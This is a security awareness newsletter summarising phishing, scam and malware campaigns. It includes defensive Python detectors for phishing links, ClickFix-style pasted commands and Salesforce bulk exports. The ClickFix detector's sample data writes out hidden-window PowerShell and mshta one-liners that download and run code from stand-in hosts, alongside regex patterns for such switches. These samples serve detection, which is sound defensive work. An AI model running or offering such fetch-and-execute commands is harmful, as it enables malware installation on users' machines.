This is a monthly newsletter I put together for an internal security awareness program. Feel free to grab and use for your own program.
Be Cautious of Government Emails About Unpaid Tolls and Other Urgent Matters
Have you recently received an email from a government agency about an unpaid toll or another urgent issue? Be extra careful: cybercriminals have sent scam messages through an official government email system, so the message can arrive from a genuine government sender and still be a scam.
Key Insights:
Scam emails can come from a legitimate government sender address when the agency's own email system has been abused, so a "real" sender is not proof that the message is safe.
A common scam involves emails claiming unpaid tolls and urging you to click a link to pay.
Be wary of urgent requests for information or payment designed to pressure you.
Always check the actual web address of a link by hovering over it (or long-pressing on a phone) before clicking, and look at the domain, not the link text. Avoid links that do not lead to the agency's official site.
Never share personal or financial information through links in suspicious emails.
Independently verify any questionable government email by contacting the agency directly, using a phone number or website address you look up yourself rather than one given in the email.
Further Reading: TechCrunch
Beware of Crypto Scams Promoted Through Hacked Social Media
The Internet Crime Complaint Center (IC3) has issued a public service announcement warning about a growing trend: scammers are taking over social media accounts and using them to trick people into investing in fake cryptocurrency schemes. These scams can look very convincing because they appear to come from accounts you or your friends might already follow.
Key Insights to Protect Yourself:
Be suspicious of investment opportunities shared via social media: Even if a post comes from a friend's account, be very cautious about any cryptocurrency investment being promoted. Their account may have been hacked.
Look for red flags in investment promises: Be wary of claims of guaranteed high returns with little to no risk. Legitimate investments always carry some level of risk.
Don't rush into investment decisions: Scammers often create a sense of urgency to pressure you into investing quickly before you have time to think it over or do your research.
Verify the information through official sources: Before investing in any cryptocurrency opportunity, independently research the platform or opportunity through trusted financial news outlets and official cryptocurrency websites. Don't rely solely on what you see on social media.
Be cautious of direct messages about investments: If you receive unsolicited direct messages on social media encouraging you to invest in cryptocurrency, treat them with extreme caution, even if they appear to be from someone you know.
Report suspicious activity: If you see suspicious cryptocurrency promotions on social media, report them to the platform. If you have been a victim of such a scam, file a complaint with the IC3 at ic3.gov.
Remember: If an investment opportunity sounds too good to be true, it probably is.
Further Reading: IC3
TikTok Videos Pushing "Free" Pirated Apps Steal Your Info!
Trend Micro researchers have uncovered a concerning new trend: videos on TikTok promote what appear to be pirated apps but are actually designed to trick you into installing "infostealer" malware such as Vidar and StealC. The videos use social engineering, walking viewers step by step through commands that compromise their own systems.
Key Insights:
Be Skeptical of "Free" Pirated Apps: If an offer seems too good to be true, especially for paid software offered for free, it's very likely a scam.
Avoid Unsolicited Technical Instructions: Never follow commands or instructions from untrusted sources, particularly if they tell you to disable security features or run unusual software.
Verify Video Sources: Just because a video is popular doesn't mean it's legitimate. Be cautious of content that pushes you to download files or visit external sites.
Recognize Social Engineering: Scammers use convincing visuals and instructions to make their malicious content seem harmless and easy to follow. Always pause and think before acting.
Further Reading: Trend Micro
Watch Out for Payroll Scams and Fake Login Pages!
Cybercriminals are getting sneakier, using new tricks to steal your paycheck. A recent alert highlights how attackers are using "SEO poisoning" to create fake payroll login pages that show up at the top of search results. If you fall for it and enter your login details, they can change your direct deposit information and reroute your pay!
Key Insights:
Access Payroll Directly: Don't rely on search engines. Always go to your payroll portal by typing the official website address directly into your browser or using a trusted bookmark.
Enable Multi-Factor Authentication (MFA): If your payroll portal offers MFA, enable it! An authenticator app or security key is stronger than a code sent by text message, but any second factor is better than none.
Be Wary of Suspicious Changes: Set up alerts in your payroll software to notify you of any changes to your direct deposit information. If you get an unexpected alert, investigate immediately.
Report Unauthorized Changes: Know how to report any unauthorized changes or suspicious activity to your HR or IT department right away.
Update Your Devices: Keep your home office routers and mobile devices updated with the latest software and use strong, unique passwords. Attackers can exploit weaknesses in outdated systems to hide their activities.
Further Reading: ReliaQuest
Deceptive CAPTCHA "ClickFix" Campaign Uses Clipboard Injection to Deliver Malware
Threat actors are running a social engineering campaign, dubbed "ClickFix," that uses fake CAPTCHA prompts on compromised or cloned websites. The technique talks users into launching malware themselves by combining clipboard injection with abuse of the Windows Run dialog, leading to the delivery of payloads such as Lumma Stealer and NetSupport RAT.
Key Insights:
Social Engineering Focus: The campaign heavily relies on user fatigue with CAPTCHA mechanisms, guiding victims through seemingly familiar steps to execute malicious code.
Clipboard Injection & Run Dialog Abuse: The core of the attack is a malicious PowerShell or mshta command that the page silently copies to the clipboard; the "verification steps" then instruct the user to paste and run it in the Windows Run dialog (typically Win+R, Ctrl+V, Enter).
Living Off the Land Binaries (LOLBins): Attackers extensively use trusted system binaries like PowerShell, mshta.exe, and certutil.exe to bypass traditional security defenses, making detection challenging.
Payloads: Frequently observed payloads include infostealers (e.g., Lumma Stealer targeting browser data, credentials, and crypto wallets) and remote access tools (e.g., NetSupport RAT for full system access).
Simplicity and Effectiveness: The campaign's success stems from its simplicity, avoiding zero-day exploits or complex hidden mechanisms, relying instead on user interaction.
Proactive Defense: This campaign underscores the need for endpoint detection and response (EDR) capable of behavioral analysis and detection of LOLBin abuse (for example, explorer.exe spawning PowerShell or mshta.exe with a URL on the command line), alongside user education on suspicious CAPTCHA prompts and the danger of pasting commands you did not write. Where users do not need it, the Run dialog can also be disabled through Group Policy.
Further Reading: SecurityOnline.info
Cybercriminals Exploit AI Hype to Spread Malware
Cybercriminals are increasingly exploiting the public's interest in artificial intelligence by creating fake AI-themed websites and advertisements to distribute malware. A recent campaign identified by Mandiant Threat Defense involves the threat group UNC6032 using deceptive ads on platforms like Facebook and LinkedIn to lure users into downloading malicious software disguised as AI video generation tools.
Key Insights:
Deceptive Advertising: Thousands of malicious ads have been disseminated, impersonating legitimate AI tools such as Luma AI and Canva Dream Lab. These ads direct users to fraudulent websites designed to mimic authentic AI services.
Malware Deployment: Upon interacting with these fake sites, users are prompted to download a ZIP file containing the STARKVEIL malware dropper. This dropper installs multiple malware components, including GRIMPULL, XWORM, and FROSTRIFT, which are designed to steal sensitive information and establish persistent access to the victim's system.
Information Theft: The deployed malware targets a range of data, including login credentials, cookies, credit card information, and digital wallet contents. Some components, like XWORM, also perform keylogging and screen capture, further compromising user privacy.
Evasion Techniques: The malware uses several tricks to avoid detection, such as padding file names with Braille Pattern Blank characters so that the real file extension is pushed out of view, and leveraging legitimate processes for malicious activities.
This campaign underscores the importance of vigilance when engaging with online advertisements, especially those offering AI-related services. Users should be cautious of unsolicited offers and verify the legitimacy of websites before downloading any software.
Further Reading: Google Cloud Blog
Beyond the Kill Chain: How Cybercriminals Invest Their Profits
Sophos X-Ops' five-part series, Beyond the Kill Chain, explores what happens after a successful cyberattack. The series reveals how financially motivated threat actors invest their illicit earnings—often blending legitimate business with ethically questionable and outright criminal ventures.
Key Insights:
Legitimate Business Ventures: Cybercriminals are investing in seemingly lawful enterprises such as restaurants, real estate, and e-commerce platforms. These ventures help launder money while also creating additional income streams.
Ethically Dubious Activities: Some threat actors operate in legal gray zones, selling spyware, monetizing vulnerability research under the guise of security services, or manipulating online traffic for advertising profits.
Criminal Enterprises: Illicit gains are also funneled into traditional criminal operations like counterfeit goods, drug trafficking, and underground gambling, showing how cybercrime supports broader organized crime ecosystems.
Implications for Cybersecurity: Mapping how threat actors reinvest their profits helps threat intelligence teams understand evolving risk models and disrupt the infrastructure supporting ongoing cybercriminal activity.
Further Reading: Sophos News
CFOs Targeted in Sophisticated Spear-Phishing Campaign
A recent spear-phishing campaign is targeting Chief Financial Officers (CFOs) and finance executives across banking, energy, insurance, and investment sectors in regions including Europe, Africa, Canada, the Middle East, and South Asia. The attackers use a multi-stage approach to deploy NetBird, a legitimate WireGuard-based remote access tool, onto compromised systems.
Key Insights:
Deceptive Recruitment Emails: The campaign begins with emails impersonating a Rothschild & Co recruiter offering a “strategic opportunity.” Victims are directed to a Firebase-hosted page featuring a custom CAPTCHA to access a malicious file.
Malicious Payload Delivery: After solving the CAPTCHA, users download a ZIP file containing a VBS script. When executed, it installs NetBird and OpenSSH, creates a hidden local admin account, and enables Remote Desktop Protocol (RDP) for persistent attacker access.
Evasion Techniques: The use of custom CAPTCHAs and trusted hosting services helps the attackers bypass traditional security defenses and increases credibility.
Attribution: Some infrastructure overlaps with known nation-state campaigns, but the specific threat actor remains unidentified.
Further Reading: Trellix Blog
Threat Actors Exploit Google Apps Script for Evasive Phishing Attacks
Threat actors are leveraging Google's Apps Script platform to host phishing pages that appear legitimate, allowing them to steal login credentials. These campaigns often begin with emails posing as invoice notifications, linking to webpages hosted using Google Apps Script. By operating within Google's trusted environment, attackers make their phishing pages seem more authentic, increasing the chances of success.
Key Insights:
Abuse of Trusted Services: Google Apps Script, a JavaScript-based platform used for automating Google Workspace tasks, is being exploited to host fake login pages that capture user credentials and send them to attacker-controlled servers.
Evasion of Security Measures: Because the pages are served from Google's own domain (script.google.com), they slip past email and web filters that judge links by domain reputation alone.
Sophisticated Phishing Techniques: The phishing emails and login prompts are convincingly designed to mimic legitimate services, making it more likely that targets will engage and provide sensitive information.
Further Reading: BleepingComputer
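The Apps Script campaign above and the Firebase-hosted CAPTCHA page in the CFO campaign share one trick: the link really does point at a Google-owned host, so any filter that trusts the brand rather than the specific host and path waves it through. The Python below is an added example, not code from BleepingComputer, Trellix or Google; it pulls the links out of a constructed HTML "invoice notification" and flags hosts that serve third-party-published content (script.google.com deployment URLs under /macros/s/<id>/exec, Firebase Hosting's web.app and firebaseapp.com) as well as anchors whose visible text names a different domain than the one they point to. The deployment ID and project names in the sample are made up.

```python
import re
from html.parser import HTMLParser
from typing import Dict, List, Optional, Tuple
from urllib.parse import urlparse

# Brand-owned hosts that serve content published by arbitrary third parties.
# An allowlist keyed on the parent brand ("anything on google.com is fine")
# lets these straight through, which is exactly what the campaign relies on.
USER_PUBLISHED_HOSTS = {
    "script.google.com": "Google Apps Script web app (any Google account can publish)",
}
USER_PUBLISHED_SUFFIXES = {
    ".web.app": "Firebase Hosting site (any Firebase project can publish)",
    ".firebaseapp.com": "Firebase Hosting site (any Firebase project can publish)",
}
# Published Apps Script deployments are served at /macros/s/<deployment id>/exec
APPS_SCRIPT_DEPLOY_RE = re.compile(r"^/macros/s/[^/]+/exec", re.IGNORECASE)
# A domain (optionally with scheme) appearing in the visible link text
DOMAIN_IN_TEXT_RE = re.compile(r"(?:https?://)?([a-z0-9-]+(?:\.[a-z0-9-]+)*\.[a-z]{2,})", re.IGNORECASE)


class LinkCollector(HTMLParser):
    """Collect (href, visible text) pairs from an HTML email body."""

    def __init__(self) -> None:
        super().__init__()
        self.links: List[Tuple[str, str]] = []
        self._href: Optional[str] = None
        self._text: List[str] = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href")
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def classify_link(href: str, text: str) -> List[str]:
    """Return the reasons a link deserves a closer look (empty if none)."""
    reasons: List[str] = []
    parsed = urlparse(href)
    host = (parsed.hostname or "").lower()
    if host in USER_PUBLISHED_HOSTS:
        reasons.append(USER_PUBLISHED_HOSTS[host])
        if host == "script.google.com" and APPS_SCRIPT_DEPLOY_RE.match(parsed.path):
            reasons.append("URL is a published Apps Script deployment, not a Google product page")
    for suffix, label in USER_PUBLISHED_SUFFIXES.items():
        if host.endswith(suffix):
            reasons.append(label)
    shown = DOMAIN_IN_TEXT_RE.search(text)
    if shown:
        # Visible text says one domain, href goes somewhere else (subdomains of
        # the shown domain are allowed, e.g. text "example.com" -> www.example.com).
        shown_host = shown.group(1).lower()
        if shown_host != host and not host.endswith("." + shown_host):
            reasons.append(f"link text shows {shown_host} but points to {host}")
    return reasons


def triage_email(html: str) -> List[Dict[str, object]]:
    """Run classify_link over every anchor in the body; keep only flagged links."""
    parser = LinkCollector()
    parser.feed(html)
    findings = []
    for href, text in parser.links:
        reasons = classify_link(href, text)
        if reasons:
            findings.append({"href": href, "text": text, "reasons": reasons})
    return findings


# Constructed sample: an "invoice notification" with a made-up deployment ID
# and made-up supplier / Firebase project names.
SAMPLE_EMAIL = """
<p>Invoice #48213 is ready.</p>
<p><a href="https://script.google.com/macros/s/AKfycbEXAMPLEdeploymentId000/exec">View invoice</a></p>
<p>Or sign in at <a href="https://billing-review.web.app/login">https://portal.example-supplier.com/invoices</a></p>
<p><a href="https://www.example-supplier.com/unsubscribe">Unsubscribe</a></p>
"""

if __name__ == "__main__":
    for finding in triage_email(SAMPLE_EMAIL):
        print(finding["href"])
        for reason in finding["reasons"]:
            print("   -", reason)
```

The point of the host and path checks is that "google.com" in a URL is not a verdict; the decision has to be made on the exact host and, for Apps Script, the /macros/s/ path that marks a user-published deployment. The text-versus-href comparison catches the second half of the lure, a displayed address the victim recognizes sitting on top of a link they do not.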
Cybercriminals Use Fake Booking Sites to Spread AsyncRAT Malware
Cybercriminals are exploiting fake Booking.com websites to infect users with AsyncRAT, a remote access trojan. Victims are lured through deceptive ads and social media links to counterfeit booking sites, where they are tricked into running a malicious PowerShell script. The attack results in full remote control of the infected system, putting sensitive personal information at risk.
Key Insights:
Attackers use fake CAPTCHA prompts to talk users into running the malicious command themselves, the same "ClickFix" pattern described above.
The AsyncRAT payload allows for full system access, including surveillance and data theft.
Domains rotate every few days, making detection and blocking more difficult.
Further Reading: Malwarebytes Blog
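The two "paste this into the Run dialog" campaigns in this issue (the ClickFix CAPTCHA lure and the fake Booking.com sites) leave the same traces on the endpoint: a trusted binary such as powershell.exe or mshta.exe started by explorer.exe with a URL or download-and-execute switches on its command line, and a copy of the pasted command in the Run dialog history under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU. The Python below is an added example, not code from either vendor report; the process events and registry values it scans are constructed to resemble Sysmon Event ID 1 fields and RunMRU entries, and the indicator list is a starting point rather than a complete signature.

```python
import re
from typing import Dict, List, Tuple

# Trusted Windows binaries that ClickFix-style lures ask the victim to run.
LOLBINS = {
    "powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "certutil.exe",
    "wscript.exe", "cscript.exe", "rundll32.exe", "regsvr32.exe",
    "bitsadmin.exe", "curl.exe",
}

URL_RE = re.compile(r"https?://[^\s'\"<>]+", re.IGNORECASE)

# Switches and cmdlets typical of a pasted one-liner: hidden window, policy
# bypass, in-memory download-and-execute, base64-encoded command bodies.
DOWNLOAD_EXEC_RE = re.compile(
    r"\biex\b|invoke-expression|\biwr\b|invoke-webrequest|invoke-restmethod"
    r"|downloadstring|downloadfile|frombase64string"
    r"|-e(?:nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}"
    r"|-w(?:indowstyle)?\s+hidden|-nop\b|-ep\s+bypass|-executionpolicy\s+bypass"
    r"|certutil(?:\.exe)?\s+.*-urlcache|mshta(?:\.exe)?\s+https?://",
    re.IGNORECASE,
)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path (or a bare command word)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def assess_process(event: Dict[str, str]) -> List[str]:
    """Reasons a process-creation event looks like a pasted ClickFix command.

    Expected keys (Sysmon Event ID 1 naming): Image, ParentImage, CommandLine.
    """
    reasons: List[str] = []
    image = basename(event.get("Image", ""))
    parent = basename(event.get("ParentImage", ""))
    cmd = event.get("CommandLine", "")
    if image in LOLBINS and parent == "explorer.exe":
        # The Run dialog (Win+R) launches its child directly under explorer.exe.
        reasons.append(f"{image} started interactively by explorer.exe")
    if image in LOLBINS and URL_RE.search(cmd):
        reasons.append("remote URL on a LOLBin command line")
    match = DOWNLOAD_EXEC_RE.search(cmd)
    if match:
        reasons.append(f"download/execute or evasion switch {match.group(0)!r}")
    return reasons


def detect_clickfix(events: List[Dict[str, str]]) -> List[Tuple[Dict[str, str], List[str]]]:
    """Return (event, reasons) for events with at least two independent
    indicators. One indicator alone (a user opening PowerShell from the
    Start menu, say) stays below the bar to limit false positives."""
    flagged = []
    for event in events:
        reasons = assess_process(event)
        if len(reasons) >= 2:
            flagged.append((event, reasons))
    return flagged


def suspicious_runmru(runmru: Dict[str, str]) -> List[str]:
    """Scan Run dialog history values (HKCU\\...\\Explorer\\RunMRU).

    Each value holds '<command>\\1'; 'MRUList' holds the ordering letters.
    Returns the stored commands that match the indicators above.
    """
    hits = []
    for name, value in runmru.items():
        if name == "MRUList":
            continue
        cmd = value[:-2] if value.endswith("\\1") else value
        tokens = cmd.split()
        if not tokens:
            continue
        first = basename(tokens[0].strip('"'))
        if not first.endswith(".exe"):
            first += ".exe"
        if first in LOLBINS and (URL_RE.search(cmd) or DOWNLOAD_EXEC_RE.search(cmd)):
            hits.append(cmd)
    return hits


# Constructed sample data: two benign launches and two ClickFix-style payloads.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe"},  # Start menu, benign
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell -w hidden -c \"iex (iwr 'https://captcha.example.invalid/verify.txt' -UseBasicParsing)\""},
    {"Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "mshta https://booking-confirm.example.invalid/robot.hta"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"powershell -File C:\Scripts\inventory.ps1"},  # benign admin script
]

SAMPLE_RUNMRU = {
    "a": "notepad\\1",
    "b": "powershell -w hidden -c \"iex (iwr 'https://captcha.example.invalid/verify.txt' -UseBasicParsing)\"\\1",
    "c": "\\\\fileserver\\share\\1",
    "MRUList": "bca",
}

if __name__ == "__main__":
    for event, reasons in detect_clickfix(SAMPLE_EVENTS):
        print(event["CommandLine"])
        for reason in reasons:
            print("   -", reason)
    print("RunMRU hits:", suspicious_runmru(SAMPLE_RUNMRU))
```

Requiring two indicators is the practical compromise: a LOLBin under explorer.exe on its own is normal daily activity, and a URL on a command line is normal for scripted installers, but the combination with a hidden-window or in-memory-execution switch is what a victim pastes and almost never what a user types. The RunMRU check is for after the fact: it survives a closed browser and a cleared clipboard, so it is worth pulling during triage of any host where the CAPTCHA lure is suspected.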
UNC6040 – Voice Phishing to Salesforce Data Extortion
Google Threat Intelligence Group (GTIG) is tracking UNC6040, a financially motivated threat cluster specializing in voice phishing (vishing) campaigns. This group is successfully impersonating IT support to gain access to organizations' Salesforce instances, primarily to steal large volumes of data for subsequent extortion. Their tactics rely heavily on manipulating end users rather than exploiting software vulnerabilities.
Key Insights:
Vishing is Key: UNC6040 uses convincing phone calls, often targeting English-speaking employees, to socially engineer access.
Salesforce Data Loader Abuse: They talk victims into authorizing a modified version of Salesforce Data Loader as a connected app, which gives the attackers broad access to query and exfiltrate sensitive data.
Lateral Movement: After Salesforce, they use stolen credentials for lateral movement into other cloud platforms like Okta and Microsoft 365.
No Platform Vulnerability: Attacks exploit user trust and process gaps, not inherent Salesforce flaws.
Persistent Threat: Extortion can occur months after the initial intrusion, indicating a patient and persistent threat.
Further Reading: The Cost of a Call: From Voice Phishing to Data Extortion
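Because the Data Loader abuse described above exploits no vulnerability, nothing on the platform side raises an alert; the signal has to come from usage, namely a newly authorized client pulling Data Loader-sized volumes, often from an address the organization never uses. The Python below is an added example, not code from the GTIG report or from Salesforce. It scores constructed API event rows whose column names are an assumption modelled on the shape of Salesforce's API event log type (CLIENT_NAME, CLIENT_IP, ENTITY_NAME, ROWS_PROCESSED) and must be mapped to whatever your org actually exports; the client names, user IDs and addresses in the sample are made up.

```python
import csv
import io
from collections import defaultdict
from typing import Dict, List

# Constructed sample export. Column names follow the shape of Salesforce's
# API event log type but are assumed here; map them to your org's real fields.
SAMPLE_LOG = """EVENT_TYPE,TIMESTAMP_DERIVED,USER_ID,CLIENT_NAME,CLIENT_IP,ENTITY_NAME,ROWS_PROCESSED
API,2025-06-02T09:01:12Z,005EXAMPLE0001,BrowserUI,203.0.113.10,Account,200
API,2025-06-02T09:03:40Z,005EXAMPLE0001,BrowserUI,203.0.113.10,Contact,50
API,2025-06-02T14:10:02Z,005EXAMPLE0002,Ticket Portal Sync,198.51.100.77,Account,50000
API,2025-06-02T14:12:45Z,005EXAMPLE0002,Ticket Portal Sync,198.51.100.77,Contact,120000
API,2025-06-02T14:15:01Z,005EXAMPLE0002,Ticket Portal Sync,198.51.100.77,Opportunity,80000
API,2025-06-02T16:00:00Z,005EXAMPLE0003,DataLoaderBulkUI,203.0.113.10,Lead,5000
"""

# API clients / connected apps the org has reviewed and expects to see, and
# the egress addresses its staff and integrations normally come from
# (both constructed for this example).
APPROVED_CLIENTS = {"BrowserUI", "DataLoaderBulkUI"}
KNOWN_EGRESS_IPS = {"203.0.113.10"}
ROW_THRESHOLD = 10_000  # rows per user+client over the export window


def summarize(log_csv: str) -> Dict[tuple, dict]:
    """Aggregate rows per (user, client): total rows, source IPs, objects touched."""
    totals = defaultdict(lambda: {"rows": 0, "ips": set(), "entities": set()})
    for row in csv.DictReader(io.StringIO(log_csv)):
        key = (row["USER_ID"], row["CLIENT_NAME"])
        totals[key]["rows"] += int(row["ROWS_PROCESSED"] or 0)
        totals[key]["ips"].add(row["CLIENT_IP"])
        totals[key]["entities"].add(row["ENTITY_NAME"])
    return totals


def detect_bulk_export(log_csv: str) -> List[dict]:
    """Flag user+client pairs that pulled a large volume through an unapproved
    client or from an unknown address.

    A vished user who authorized a renamed Data Loader shows up as a
    never-before-seen CLIENT_NAME with Data Loader-sized row counts, usually
    from an address outside the org's normal egress.
    """
    findings = []
    for (user, client), agg in summarize(log_csv).items():
        if agg["rows"] < ROW_THRESHOLD:
            continue
        reasons = []
        if client not in APPROVED_CLIENTS:
            reasons.append(f"unapproved API client/connected app {client!r}")
        unknown_ips = agg["ips"] - KNOWN_EGRESS_IPS
        if unknown_ips:
            reasons.append(f"export from unknown address(es) {sorted(unknown_ips)}")
        if reasons:
            findings.append({"user": user, "client": client, "rows": agg["rows"],
                             "entities": sorted(agg["entities"]), "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in detect_bulk_export(SAMPLE_LOG):
        print(f"{finding['user']} via {finding['client']}: {finding['rows']} rows "
              f"from {finding['entities']}")
        for reason in finding["reasons"]:
            print("   -", reason)
```

The legitimate Data Loader session in the sample stays quiet because it is an approved client, comes from a known address and stays under the threshold; the renamed one trips on all three. The approved-client list is doing the real work here, which is the operational takeaway: keep an inventory of which connected apps are allowed to hold API access, and treat a new name in the logs as a question for the user who authorized it.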